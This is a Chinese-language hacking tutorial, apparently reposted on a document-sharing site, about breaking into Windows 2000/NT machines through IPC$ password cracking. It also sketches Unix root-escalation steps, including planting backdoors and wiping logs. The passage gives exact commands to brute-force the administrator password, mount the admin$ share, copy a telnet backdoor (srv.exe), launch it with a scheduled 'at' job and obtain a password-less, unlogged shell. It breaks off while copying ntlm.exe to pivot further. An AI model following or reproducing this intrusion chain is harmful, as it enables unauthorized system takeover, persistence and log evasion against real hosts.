net user 命令入侵
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
net user 命令入侵
2010-11-28 12:01
其实“口令入侵”不管是破解FTP口令还是TELNET口令,最终的目的都是为了取得系统控制权,成为administrators/root用户。对windows2000/NT来说,获得其管理员身份无非三种途径:一是得到SAM._文件,然后用10phtcrack之类的工具来暴力破解;二是用流光之类的工具对目标系统的简单IPC$、FTP密码、SQL密码等进行扫描探测;三是通过
系统漏洞,绕过系统身份认证以管理员身份进去,然后添加一个administrators组的用户和密码。第一种方法需费很多时间,只要得到了SAM._文件,成功几率倒也不小;第二种方法只对那些粗心大意的网络管理员有用,譬如他将密码设置为1234,那用流光很快就能探测出来;第三种方法最为常见,寻找系统漏洞,然后尝试入侵,一直以来是网上入侵者们的兴趣所在,而且成功概率也高。对于UNIX/Linux系统,获取一个root权限要困难得多,通过查看一些资料,我发现这类入侵都遵循这么一个思路:1、扫描远程系统,试图发现漏洞,
如rpc漏洞、FTP匿名登陆等。2、finger远程系统,尝试获得其用户列表。3、根据已获得资料试图得到远程系统的一个shell。这一步很重要,黑客的技术水平如何就体现在这里了,一些高明的黑客利用极其简单的一个系统弱点就能得到一个自己想要的shell。4、得到shell 后,黑客就可以远程rsh或rlogin过去了,然后查看系统版本信息,根据已有的经验判断该版本系统可能存在的缓冲区溢出漏洞。5、查找系统可写入目录,并判断自己是否有可编译权限。6、当这一切完成后,黑客就上传一个溢出程序,在远程主机上编译并
执行,从而利用溢出漏洞得到root权限。7、留下后门,清除日志。
一、WINDOWS系统口令入侵
一般来说,这类入侵具体有这么几种手法:
1、通过IPC$口令破解入侵;
2、利用Unicode漏洞尝试入侵;
3、利用开放终端服务和输入法漏洞入侵;
4、利用IIS远程溢出漏洞入侵;
5、利用SQL弱口令入侵。
下面简要介绍这5种入侵过程。
1、IPC$入侵:IPC$是指进程间的通信,win2000/NT主机之间通过它来实现数据交换。而利用这一特征还在于2000/NT系统有一个默认的隐藏共享,这个共享被设计的初衷是为了方便管理员远程管理操作系统的,现在却被黑客拿来实现他们的目的。
开启流光,选择“探测->扫描POP3/FTP/NT/SQL主机”,在“开始地址”和“结束地址”里都填入目标地址:192.168.4.95,在“扫描主机类型”下拉菜单里选择“NT/98”,点“确定”开始扫描。
经过几秒钟后,192.168.4.95 这台主机就出现在左边的主机类型“IPC$主机”里。选择这台主机,点击右键,在弹出的下拉菜单
里选择“探测->探测IPC用户列表”。
开始探测,只要用户的密码字典里包含目标主机的密码,则流光迟早能探测出来,探测时间的长短取决于用户的密码字典大小和攻击机器的运行速度;典型的黑客字典都有十几兆大小,这样探测起来就需要很长(可能是几天)的时间。经过几分钟的探测后,我们发现,
流光已成功的探测到了目标主机的三个密码,其中包括系统管理员Administrator密码:cell.
好了,有了目标主机的系统管理员密码后,这台主机就已经完全控制在我们手中了。下面说明如何利用流光探测到的密码从IPC$入侵主机. 开DOS窗口,先PING一下目标主机:192.168.4.95,看看TTL值为128,可以判定这台主机为NT/WIN2000系统了,正是我们所要。用如下命令:
c:\>net use \\192.168.4.95\ipc$ “cell” /user:”administrator”
提示:命令运行成功。已经成功的和目标主机建立连接。
复制一个Telnet程序上去(小榕流光安装目录下的Tools目录里的Srv.exe) ,这个程序是在目标系统上开一个Telnet服务,端口是99。
c:\>cd tools
c:\>tools>copy .\srv.exe \\192.168.4.95\admin$\system32
admin$是NT的默认的隐藏共享,他对应的是NT安装目录里的system32目录.通常是在c:\winnt\system32,你也可以用C$ , D$ 他们分别代表盘符C盘,D盘.都是系统的默认共享。
显示:已复制1个文件。文件复制成功。
下面我们需要远程启动这项服务,利用WIN2000的SCHEDULE(定时)服务来启动这个程序。先看一下目标系统的时间:
c:\>net time \\192.168.4.95
显示:
\\192.168.4.95的当前时间是2001/10/22上午10:00
命令成功完成。
下面设定目标系统的TELNET服务在指定时间内启动,用at命令:
c:\>at \\192.168.4.95 10:02 srv.exe
显示:
新加了一项作业,作业ID=1。
说明命令成功执行,下一步就等到服务启动后TELNET上去。
2分钟后,可以TELNET了:
c:\>telnet 192.168.4.95 99
(srv.exe开的端口是99.这里我们就telnet 192.168.4.95 99)
这个程序好在不用输入口令和没有日志记录.但是每一次使用后都会自动关闭,下次要用时要重新启动,才能再用。
我们看到如下界面:
Microsoft Windows 2000 [version 5.00.2195]
<c>版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32\>
这样,我们就成功的登陆上去了。
由于我们已经是系统的管理员,所以有权在目标主机上做任何事,包括创建文件、删除文件、给文件该名、创建、删除用户帐号等。
至此,目标系统再无任何安全可言。
当然,我们还可以以目标系统为跳板,进一步入侵别的系统。
另开一个DOS窗口,先复制TOOLS目录下的另一个文件NTLM.EXE上去:
c;\tools\>copy .\ntlm.exe